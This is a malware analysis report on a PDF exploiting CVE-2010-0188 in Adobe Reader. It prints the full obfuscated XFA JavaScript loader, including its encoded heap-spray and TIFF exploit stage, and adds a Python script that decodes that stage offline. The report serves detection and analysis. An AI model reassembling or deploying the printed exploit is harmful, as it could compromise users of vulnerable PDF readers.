Malicious PDF — malware analysis report

Static analysis result for SHA-256 01dfb86782ba0958…

Verdict: MALICIOUS
Type: PDF
Size: 12.9 KB
First seen: 2026-05-08
MD5: 96d3a299293c7c22ea247e78dca920c2
SHA-1: fec221a73c3393439b3b3dd4101ac045e472c612
SHA-256: 01dfb86782ba09581278f8ef720ee64996990994007e38169a4ff125489e0ecb
Risk Score: 366

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 Command and Scripting Interpreter: JavaScript

The PDF carries an XFA (XML Forms Architecture) form whose `initialize` event runs embedded JavaScript. That first stage is a decoder rather than the exploit itself: it first checks that it is running in a genuine JavaScript engine by comparing `(Number+Number).substr(2,3)` with `([].sort+[].sort).substr(2,3)` (both yield "nct" when built-in functions stringify natively; an emulator that renders them differently never defines `ar`, and the script dies on `ar.length`). It then resolves `eval` through the obfuscated property name `x[0]+'val'`, maps every `@`-separated integer in the `ar` literal to a character of the 75-character alphabet `cc`, and passes the joined result to `eval`. XML numeric character references (`&#000119;` for `w`, `&#110;` for `n`, `&#46;` for `.`) hide the assignment and `join` tokens from scanners that do not resolve the XML before looking at the script. The decoded second stage is the heap-spray and generated-TIFF template for CVE-2010-0188 in Adobe Reader's LibTIFF parser (see the CVE_2010_0188 heuristic below); the report also assesses that it downloads and executes a further payload, although the exact URL is obfuscated within the script.

Machine Learning

  • Nyx PDF Classifier: malicious, score 1.0000

Heuristics (12)

  • Adobe Reader LibTIFF XFA image exploit (CVE-2010-0188) [critical, CVE likely] CVE_2010_0188
    PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field's rawValue to trigger Adobe Reader's LibTIFF parser.
  • XFA form contains risky executable script [high, CVE related] PDF_XFA_SCRIPT
    PDF embeds an XFA form whose script block contains exploit, submission/launch, or shell-execution primitives. Ordinary LiveCycle print/update scripts are left as generic XFA/JS signals unless stronger behavior is present.
  • ClamAV: Pdf.Exploit.Agent-36755 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36755
  • XFA JavaScript heap-spray exploit code [critical] PDF_XFA_HEAP_SPRAY
    PDF contains XFA script content with heap-spray or shellcode-like JavaScript markers such as large encoded word sequences, util.pack, large arrays, or spray variable names. This is a weaponised Adobe Reader exploit pattern, not a normal interactive form.
  • JavaScript action [low, 2 related findings] PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [critical] PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Malformed active-content stream length [medium] PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are a common parser-evasion trick and supporting evidence around Reader exploit streams.
  • XFA form [low] PDF_XFA
    PDF uses XML Forms Architecture, which can contain script logic.
  • AcroForm button with action trigger [low] PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger; this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures.
  • Embedded script payload in PDF stream [info] PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives; common in accessible XFA forms but worth surfacing for analyst review.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All three URLs below are the XDP/XFA XML namespace identifiers used by the form markup, not network contact points.
    • http://ns.adobe.com/xdp/ (in PDF document text)
    • http://www.xfa.org/schema/xfa-template/2.5 (in PDF document text)
    • http://www.xfa.org/schema/xfa-data/1.0 (in PDF document text)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: embedded_pdf_script_000003e2.bin
Kind: pdf-embedded-script
Source: PDF raw stream script payload at offset 0x3E2
Size: 12194 bytes
SHA-256: 5d3901f8867e95bd6daa686fa52a1c0de62799fa1da7ec90c02078be63129e59

Script preview (first 1,000 lines of the extracted script):
<xdp:xdp xmlns:xdp='http://ns.adobe.com/xdp/'>
<asd/>as<config><asd/>
<present>
<pdf
>
<int>0</int>
<interactive>&#000049;</interactive>
a
<asd/>a<version>
1.5</version>
a<asd/>
</pdf>
</present>
<asd/></config><asd/>
<template xmlns='http://www.xfa.org/schema/xfa-template/2.5'>
<asd/>
a<subform name="a1">		<pageSet>
			<pageArea id="roteYom" name="roteYom">
				<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
				<medium long="792pt" short="612pt" stock="default"/>
			</pageArea>
		</pageSet>
<asd/>a
		<subform name='v236536b346b'>
		a<asd/>a<field name='qwe123b'>a<asd/>a<event asd='wqr' activity='initialize'>
a<asd></asd><script
contentType='application/x-javascript'>

m=1-1;
cc="aF{p8hIS([Q76d3lbwAqE19?V&lt;y=\"kWj^;]c:rR ut)C5Lx%/4U+v'm,.DeB*oK-iMYng20s}f_";
x='efv5';
q=x[0]+'val';
a=(Number+Number).substr(2,3);
aa=([].sort+[].sort).substr(2,3);
if (a===aa){
t='214124';
e=t['indexOf'];
&#000119;=e(12)[q];
s=new Array();
ss='split';
ar='52@0@37@39@3@0@13@13@64@67@68@33@52@0@37@39@16@16@16@55@39@35@35@35@55@39@13@13@13@55@39@58@58@58@55@39@73@73@73@55@39@68@68@68@55@39@5@5@5@33@52@0@37@39@3@61@64@67@41@58@37@71@74@0@55@39@64@33@52@0@37@39@46@39@27@39@67@58@17@39@18@37@37@0@26@8@42@33@52@0@37@39@26@39@27@39@67@58@17@39@18@37@37@0@26@8@42@33@52@0@37@39@74@15@21@27@28@49@35@69@70@12@70@70@73@70@44@21@11@4@70@49@0@14@35@69@70@12@70@70@73@70@73@12@14@4@70@49@0@0@14@58@16@4@70@49@0@14@70@69@70@4@69@49@0@12@58@69@73@4@70@49@0@49@21@49@21@49@21@49@21@69@12@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@21@69@14@22@4@70@49@0@12@49@69@70@12@70@70@73@70@70@70@49@70@70@70@70@49@21@49@21@49@21@49@21@49@21@49@21@49@21@49@21@12@12@4@14@58@49@73@35@73@35@4@44@58@49@11@44@14@49@58@22@44@73@14@14@35@70@12@49@4@16@49@70@14@70@4@16@49@70@70@35@4@16@11@70@21@35@44@12@4@16@11@12@70@4@14@14@13@16@12@12@4@16@44@58@14@35@70@14@11@49@14@14@69@35@4@21@58@58@21@44@21@70@73@73@73@73@16@4@4@16@49@70@14@70@35@14@49@12@14@22@70@12@11@44@73@16@4@11@14@49@69@49@4@44@58@49@11@44@44@21@58@22@58@16@49@35@44@21@44@12@4@16@11@44@14@35@4@16@11@49@14@44@11@4@70@14@73@44@44@12@4@16@11@12@69@70@70@14@73@44@14@14@35@22@49@22@49@21@73@35@0@13@70@14@35@44@14@14@13@16@70@73@16@58@21@70@14@4@73@69@11@49@70@4@35@21@35@16@70@13@70@14@13@0@49@70@58@16@73@21@14@16@21@73@11@44@58@12@44@58@4@16@44@58@69@49@70@14@13@13@12@12@4@16@70@35@49@16@4@13@49@12@58@35@73@73@44@49@69@49@70@35@4@16@13@4@70@14@13@13@4@16@70@49@4@16@70@14@35@44@0@16@44@58@44@22@35@14@58@16@44@14@0@13@4@16@12@4@69@70@4@70@11@13@70@35@14@14@11@49@70@14@22@12@58@16@73@14@4@16@12@4@70@4@4@16@73@11@12@0@70@44@44@22@58@4@22@4@73@73@73@73@73@73@58@69@73@22@58@4@70@70@70@70@70@70@70@70@44@4@44@70@12@0@49@70@12@4@73@73@70@70@70@70@70@70@44@70@4@14@35@70@21@22@44@70@44@44@4@16@58@35@4@16@44@58@21@70@4@14@35@14@70@44@73@73@58@14@12@4@12@73@12@58@70@70@70@70@12@4@11@44@11@69@12@35@12@13@44@49@73@73@21@12@4@14@35@49@70@4@4@16@58@4@58@4@12@21@73@73@73
@73@73@73@58@16@70@69@58@16@11@69@4@21@58@35@70@49@70@21@70@70@70@70@4@13@44@35@69@49@70@35@35@11@70@49@69@49@11@69@12@44@12@11@11@14@35@11@49@49@69@49@70@49@11@12@11@69@14@14@14@69@35@11@49@49@69@49@70@4@69@70@69@13@11@14@69@70@44@14@12@4@73@4@70@70@70@70@70@70@73@73@44@12@70@35@4@16@58@4@14@14@35@22@44@21@35@11@49@49@21@13@70@70@11@11@11@70@12@69@11@49@35@11@49@49@21@13@70@44@69@58@12@49@12@35@12@35@35@12@49@49@21@13@70@22@70@70@44@22@4@0@35@21@70@49@14@70@4@4@49@49@21@13@70@49@49@21@44@21@12@0@70@70@12@0@70@70@44@14@44@11@12@0@70@70@73@73@44@12@21@49@4@44@35@70@11@44@21@12@12@0@70@70@44@14@73@73@44@12@70@49@12@0@70@70@4@14@58@16@70@35@44@14@73@73@44@12@70@49@4@14@35@14@70@35@58@16@70@69@58@16@21@14@49@11@4@70@14@73@70@70@11@44@73@0@49@11@4@70@14@73@70@70@11@44@35@49@12@0@70@70@12@0@73@58@73@73@44@12@70@4@58@4@22@35@73@58@73@73@73@73@4@58@49@58@70@58@58@35@22@4@73@58@4@0@70@58@4@22@12@73@70@21@16@13@14@14@35@0@4@0@44@16@21@16@35@12@49@12@11@22@14@12@21@0@69@73@11@70@12@4@11@49@11@49@11@70@14@0@69@73@69@73@14@21@14@4@14@49@69@58@14@4@14@69@69@58@14@21@14@21@14@12@69@58@14@14@14@22@69@73@11@11@69@58@11@70@12@4@11@70@14@73@12@12@14@13@14@70@69@12@12@44@14@13@14@49@70@70@70@70@28@33@52@0@37@39@74@15@69@27@28@49@35@69@70@12@70@70@73@0@44@12@14@4@70@49@0@14@35@69@70@12@70@70@73@22@12@69@21@4@70@49@0@22@70@21@73@4@70@49@0@14@70@22@70@4@49@49@0@11@13@11@58@4@70@49@0@49@21@49@21@49@21@49@21@69@12@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@70@11@21@4@4@4@70@49@0@12@49@69@70@12@70@70@73@70@70@70@49@70@70@70@70@49@21@49@21@49@21@49@21@49@21@49@21@49@21@49@21@12@12@4@14@58@49@73@35@73@35@4@44@58@49@11@44@14@49@58@22@44@73@14@14@35@70@12@49@4@16@49@70@14@70@4@16@49@70@70@35@4@16@11@70@21@35@44@12@4@16@11@12@70@4@14@14@13@16@12@12@4@16@44@58@14@35@70@14@11@49@14@14@69@35@4@21@58@58@21@44@21@70@73@73@73@73@16@4@4@16@49@70@14@70@35@14@49@12@14@22@70@12@11@44@73@16@4@11@14@49@69@49@4@44@58@49@11@44@44@21@58@22@58@16@49@35@44@21@44@12@4@16
@11@44@14@35@4@16@11@49@14@44@11@4@70@14@73@44@44@12@4@16@11@12@69@70@70@14@73@44@14@14@35@22@49@22@49@21@73@35@0@13@70@14@35@44@14@14@13@16@70@73@16@58@21@70@14@4@73@69@11@49@70@4@35@21@35@16@70@13@70@14@13@0@49@70@58@16@73@21@14@16@21@73@11@44@58@12@44@58@4@16@44@58@69@49@70@14@13@13@12@12@4@16@70@35@49@16@4@13@49@12@58@35@73@73@44@49@69@49@70@35@4@16@13@4@70@14@13@13@4@16@70@49@4@16@70@14@35@44@0@16@44@58@44@22@35@14@58@16@44@14@0@13@4@16@12@4@69@70@4@70@11@13@70@35@14@14@11@49@70@14@22@12@58@16@73@14@4@16@12@4@70@4@4@16@73@11@12@0@70@44@44@22@58@4@22@4@73@73@73@73@73@73@58@69@73@22@58@4@70@70@70@70@70@70@70@70@44@4@44@70@12@0@49@70@12@4@73@73@70@70@70@70@70@70@44@70@4@14@35@70@21@22@44@70@44@44@4@16@58@35@4@16@44@58@21@70@4@14@35@14@70@44@73@73@58@14@12@4@12@73@12@58@70@70@70@70@12@4@11@44@11@69@12@35@12@13@44@49@73@73@21@12@4@14@35@49@70@4@4@16@58@4@58@4@12@21@73@73@73@73@73@73@58@16@70@69@58@16@11@69@4@21@58@35@70@49@70@21@70@70@70@70@4@13@44@35@69@49@70@35@35@11@70@49@69@49@11@69@12@44@12@11@11@14@35@11@49@49@69@49@70@49@11@12@11@69@14@14@14@69@35@11@49@49@69@49@70@4@69@70@69@13@11@14@69@70@44@14@12@4@73@4@70@70@70@70@70@70@73@73@44@12@70@35@4@16@58@4@14@14@35@22@44@21@35@11@49@49@21@13@70@70@11@11@11@70@12@69@11@49@35@11@49@49@21@13@70@44@69@58@12@49@12@35@12@35@35@12@49@49@21@13@70@22@70@70@44@22@4@0@35@21@70@49@14@70@4@4@49@49@21@13@70@49@49@21@44@21@12@0@70@70@12@0@70@70@44@14@44@11@12@0@70@70@73@73@44@12@21@49@4@44@35@70@11@44@21@12@12@0@70@70@44@14@73@73@44@12@70@49@12@0@70@70@4@14@58@16@70@35@44@14@73@73@44@12@70@49@4@14@35@14@70@35@58@16@70@69@58@16@21@14@49@11@4@70@14@73@70@70@11@44@73@0@49@11@4@70@14@73@70@70@11@44@35@49@12@0@70@70@12@0@73@58@73@73@44@12@70@4@58@4@22@35@73@58@73@73@73@73@4@58@49@58@70@58@58@35@22@4@73@58@4@0@70@58@4@22@12@73@70@21@16@13@14@14@35@0@4@0@44@16@21@16@35@12@49@12@11@22@14@12@21@0@69@73@11@70@12@4@11@49@11@49@11@70@14@0@69@73@69@73@14@21@14@4@14@49@69@58@14@4@14@69@69@58@14@21@14@21@14@12@69@58@14@14@14@22@69@73@11@11@69@
58@11@70@12@4@11@70@14@73@12@12@14@13@14@70@69@12@12@44@14@13@14@49@70@70@70@70@28@33@74@15@14@27@0@3@3@33@74@15@49@27@67@58@17@39@18@37@37@0@26@8@42@33@73@40@67@35@41@64@61@67@39@74@15@44@8@42@2@52@0@37@39@74@15@12@27@74@15@14@56@52@64@58@17@58@37@24@58@37@71@64@61@67@56@41@61@7@41@37@64@67@68@8@42@33@74@15@12@27@74@15@12@56@37@58@3@15@0@35@58@8@53@56@53@55@53@53@42@33@17@5@64@15@58@8@74@15@12@56@15@58@67@68@41@5@25@49@42@74@15@12@51@27@53@70@53@33@37@58@41@40@37@67@39@3@0@37@71@58@6@67@41@8@74@15@12@55@21@70@42@72@73@40@67@35@41@64@61@67@39@74@15@11@8@74@15@4@55@74@15@22@42@2@17@5@64@15@58@8@74@15@4@56@15@58@67@68@41@5@60@69@25@74@15@22@42@74@15@4@51@27@74@15@4@33@37@58@41@40@37@67@39@74@15@4@56@71@40@16@71@41@37@64@67@68@8@70@55@74@15@22@48@69@42@72@73@40@67@35@41@64@61@67@39@74@6@70@8@74@6@21@42@2@74@6@21@27@40@67@58@71@35@0@3@58@8@74@6@21@42@33@37@61@41@58@57@0@29@27@74@6@21@56@15@58@67@68@41@5@60@69@33@13@0@29@38@61@41@58@27@40@67@58@71@35@0@3@58@8@53@47@40@22@70@22@70@53@42@33@71@3@37@0@26@27@74@15@11@8@13@0@29@38@61@41@58@55@70@46@69@70@70@70@63@37@61@41@58@57@0@29@42@33@15@61@46@30@5@58@58@27@74@6@21@51@71@3@37@0@26@33@15@61@46@30@5@58@58@27@74@15@11@8@15@61@46@30@5@58@58@55@44@69@49@70@22@4@42@33@73@61@37@8@64@27@70@33@39@64@39@25@39@49@70@70@33@39@64@51@51@42@74@15@49@9@64@34@27@15@61@46@30@5@58@58@56@71@40@16@71@41@37@8@70@55@15@61@46@30@5@58@58@56@15@58@67@68@41@5@63@21@42@51@13@0@29@38@61@41@58@33@72@73@40@67@35@41@64@61@67@39@74@6@69@8@74@6@21@55@15@58@67@42@2@17@5@64@15@58@8@74@6@21@56@15@58@67@68@41@5@25@15@58@67@42@74@6@21@51@27@74@6@21@33@37@58@41@40@37@67@39@74@6@21@56@71@40@16@71@41@37@64@67@68@8@70@55@15@58@67@42@72@73@40@67@35@41@64@61@67@39@74@6@14@8@74@6@21@42@2@37@58@41@27@53@53@33@73@61@37@8@64@27@70@33@64@25@74@6@21@56@15@58@67@68@41@5@33@64@51@27@69@42@2@16@27@74@6@21@56@71@40@16@71@41@37@8@64@55@69@42@33@35@27@3@0@37@71@58@6@67@41@8@16@55@21@12@42@33@37@58@41@51@27@7@41@37@64@67@68@56@73@37@61@54@43@5@0@37@43@61@13@58@8@35@42@33@72@37@5
8@41@40@37@67@39@37@58@41@72@73@40@67@35@41@64@61@67@39@74@31@64@21@8@74@6@21@55@74@6@49@42@2@74@6@44@27@53@53@33@73@61@37@8@74@6@12@27@70@33@74@6@12@25@74@6@21@56@15@58@67@68@41@5@33@74@6@12@51@51@42@2@74@15@22@27@74@6@49@56@15@58@67@68@41@5@33@74@6@11@27@74@6@21@56@35@5@0@37@43@61@13@58@18@41@8@74@6@12@42@33@74@6@4@27@74@6@49@56@35@5@0@37@43@61@13@58@18@41@8@74@6@12@47@74@15@22@42@33@74@6@44@51@27@7@41@37@64@67@68@56@73@37@61@54@43@5@0@37@43@61@13@58@8@74@6@11@32@74@6@4@42@33@72@37@58@41@40@37@67@39@74@6@44@72@73@40@67@35@41@64@61@67@39@74@6@22@8@74@6@12@42@2@74@31@70@27@74@6@12@56@41@61@7@41@37@64@67@68@8@21@12@42@33@74@31@21@27@74@31@70@56@15@58@67@68@41@5@33@74@6@44@27@8@74@31@21@47@69@42@23@53@70@53@51@74@31@70@36@74@31@70@33@37@58@41@40@37@67@39@74@6@44@72@73@40@67@35@41@64@61@67@39@74@31@69@8@74@6@21@42@2@74@6@44@27@53@53@33@73@61@37@8@74@6@12@27@70@33@74@6@12@25@74@6@21@56@15@58@67@68@41@5@33@74@6@12@51@27@69@42@2@74@6@44@51@27@53@47@40@53@33@74@6@44@51@27@74@6@22@8@74@6@21@56@35@5@0@37@43@61@13@58@18@41@8@74@6@12@51@21@42@42@33@74@6@44@51@27@74@6@22@8@74@6@21@56@35@5@0@37@43@61@13@58@18@41@8@74@6@12@42@42@72@37@58@41@40@37@67@39@74@6@44@72@73@40@67@35@41@64@61@67@39@74@31@14@8@42@2@74@31@49@27@74@15@44@8@42@33@64@73@8@74@31@49@25@22@70@70@70@42@2@74@31@44@27@53@61@51@40@18@7@31@68@68@68@29@3@40@45@49@59@62@48@48@48@48@48@17@18@18@18@18@59@18@18@18@18@18@18@18@18@18@18@18@18@10@18@18@18@18@18@18@18@18@73@5@0@18@7@64@18@68@66@18@22@4@20@6@59@62@53@33@74@31@12@27@74@15@21@33@74@31@11@27@74@6@14@8@74@31@12@42@72@58@15@71@58@2@74@31@44@27@53@29@59@51@18@7@31@64@10@5@20@3@22@73@61@59@62@48@48@48@48@48@17@18@18@18@18@59@18@18@18@18@18@18@18@18@18@18@18@18@10@18@18@18@18@18@18@18@18@66@46@43@18@7@64@18@68@66@18@48@73@20@49@59@62@53@33@74@31@12@27@74@15@69@33@74@31@11@27@74@6@14@8@74@31@12@42@72@74@31@4@27@53@7@50@29@19@18@57@68@68@18@18@59@59@53@33@74@31@22@27@74@6@69@8@53@10@50@1@59@53@55@21@70@22@4@49@42@33@74@15@15@70@27@53@10@10@35@18@18@18@20@57@18@18@20@18@1
8@18@18@17@6@18@18@18@18@10@20@57@18@18@20@18@18@18@18@59@18@18@18@18@18@17@20@57@18@18@20@18@18@18@18@59@18@18@18@18@59@68@20@57@18@18@20@18@18@18@18@59@18@18@18@18@20@10@20@20@18@18@20@18@18@18@18@6@18@18@18@18@1@17@20@20@18@18@20@18@18@18@18@17@6@18@18@18@50@18@20@57@18@65@17@18@18@18@43@7@6@18@18@18@18@18@18@18@18@18@18@65@57@18@31@48@48@48@48@48@53@33@74@15@15@21@27@74@31@4@51@74@31@22@51@74@15@15@70@51@74@31@44@33@74@15@15@69@27@74@31@64@21@8@74@31@11@55@53@53@42@33@64@73@8@74@15@15@69@56@15@58@67@68@41@5@47@69@42@74@15@15@69@51@27@40@67@58@71@35@0@3@58@8@53@47@70@70@53@42@33@74@15@15@14@27@74@31@69@8@74@15@15@69@42@33@17@64@41@5@8@2@29@36@74@15@15@14@72@42@74@6@70@8@29@42@33@19@17@58@21@69@14@16@56@37@0@17@24@0@15@40@58@27@74@15@15@21@72@74@31@14@8@42@33';
if(1)ar=ar.split('@');
}
&#110;=cc;
for(i=0;i&lt;ar.length;i++){
s[i]=n[ar[i]];
}
w(s&#46;join(''));

</script>a<asd/>b</event>
<asd/>a<ui>b
<asd/>a
<imageEdit qwe='qwe'/>
<asd/>a
</ui>
</field>
<asd/>a
</subform>
</subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.0' b='b'>
<xfa:data><a1 test="123">
</a1>
</xfa:data>
</xfa:datasets>
</xdp:xdp>
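To recover the second stage without opening the file in Reader, the decoder loop in the preview above (`s[i]=n[ar[i]]` followed by `w(s.join(''))`) can be replayed offline. The Python below is an added analyst's example, not part of the report or the sample: the alphabet and the first twelve `ar` indices are copied from the preview, the rest of the script body is a constructed stand-in escaped the same way the extracted XFA `<script>` is, and the regexes that locate `cc` and `ar` assume this sample's variable names. Those twelve indices decode to `var padding;`, the opening of the CVE-2010-0188 template the heuristics describe; the remaining indices decode the same way once the full `ar` literal, which the preview wraps across several lines, is pasted in.

```python
import re

# Alphabet copied from the sample's `cc` literal above, after undoing the
# XML `&lt;` reference and the JavaScript `\"` escape. 75 characters; an
# index in `ar` is simply a position in this string.
SAMPLE_ALPHABET = (
    "aF{p8hIS([Q76d3lbwAqE19?V<y=\"kWj^;]c:rR ut)C5Lx%/4U+v'm,.DeB*oK-iMYng20s}f_"
)

# First twelve index values of the sample's `ar` literal, copied from the preview.
SAMPLE_AR_PREFIX = "52@0@37@39@3@0@13@13@64@67@68@33"

# Constructed stand-in for the script body, escaped exactly the way the
# extracted XFA <script> is: XML character references plus a JS-escaped quote.
CONSTRUCTED_SCRIPT = (
    'cc="aF{p8hIS([Q76d3lbwAqE19?V&lt;y=\\"kWj^;]c:rR ut)C5Lx%/4U+v\'m,.DeB*oK-iMYng20s}f_";\n'
    "ar='52@0@37@39@3@0@13@13@64@67@68@33';\n"
    "&#110;=cc;\n"
    "w(s&#46;join(''));\n"
)

_XML_NAMED = {"lt": "<", "gt": ">", "amp": "&", "quot": '"', "apos": "'"}


def xml_unescape(text):
    """Resolve XML character references the way the XFA (XML) parser does
    before the JavaScript engine sees the script: &#000119; -> 'w', &lt; -> '<'.
    Leading zeros are legal in XML decimal references, which is what lets the
    sample hide the `w=` and `n=` assignments from scanners that grep raw bytes."""
    def repl(m):
        ref = m.group(1)
        if ref.startswith("#x"):
            return chr(int(ref[2:], 16))
        if ref.startswith("#"):
            return chr(int(ref[1:]))
        return _XML_NAMED[ref]
    return re.sub(r"&(#x[0-9A-Fa-f]+|#[0-9]+|lt|gt|amp|quot|apos);", repl, text)


def decode_indices(alphabet, index_text, sep="@"):
    """Replay `s[i]=n[ar[i]]; s.join('')` offline: every separator-delimited
    integer selects one character of the alphabet. Whitespace is removed first,
    so an `ar` literal that an extraction tool wrapped across lines still decodes."""
    compact = re.sub(r"\s+", "", index_text)
    out = []
    for tok in compact.split(sep):
        if tok == "":
            continue
        idx = int(tok)
        if idx >= len(alphabet):
            raise ValueError("index %d is outside the %d-char alphabet" % (idx, len(alphabet)))
        out.append(alphabet[idx])
    return "".join(out)


def decode_xfa_script(script_xml):
    """Take the escaped XFA <script> body, recover the alphabet and index
    literals, and return the second-stage JavaScript that `w(s.join(''))`
    would hand to eval. The variable names `cc` and `ar` are this sample's;
    other samples rename them, so the two regexes are an assumption to adjust."""
    js = xml_unescape(script_xml)
    m_cc = re.search(r'cc="((?:\\.|[^"\\])*)"', js)
    m_ar = re.search(r"ar='([0-9@\s]*)'", js)
    if not (m_cc and m_ar):
        raise ValueError("alphabet or index literal not found")
    alphabet = re.sub(r"\\(.)", r"\1", m_cc.group(1))  # undo JS backslash escapes
    return decode_indices(alphabet, m_ar.group(1))


if __name__ == "__main__":
    # Read the result, never eval it. With the full `ar` from the preview pasted
    # into CONSTRUCTED_SCRIPT the output is the CVE-2010-0188 stage described above.
    print(decode_xfa_script(CONSTRUCTED_SCRIPT))
```

Decoding statically rather than emulating the script also sidesteps the engine check: an emulator that stringifies `Number` or `Array.prototype.sort` differently from a native engine fails the `a===aa` comparison, never defines `ar`, and throws on `ar.length` before any payload appears.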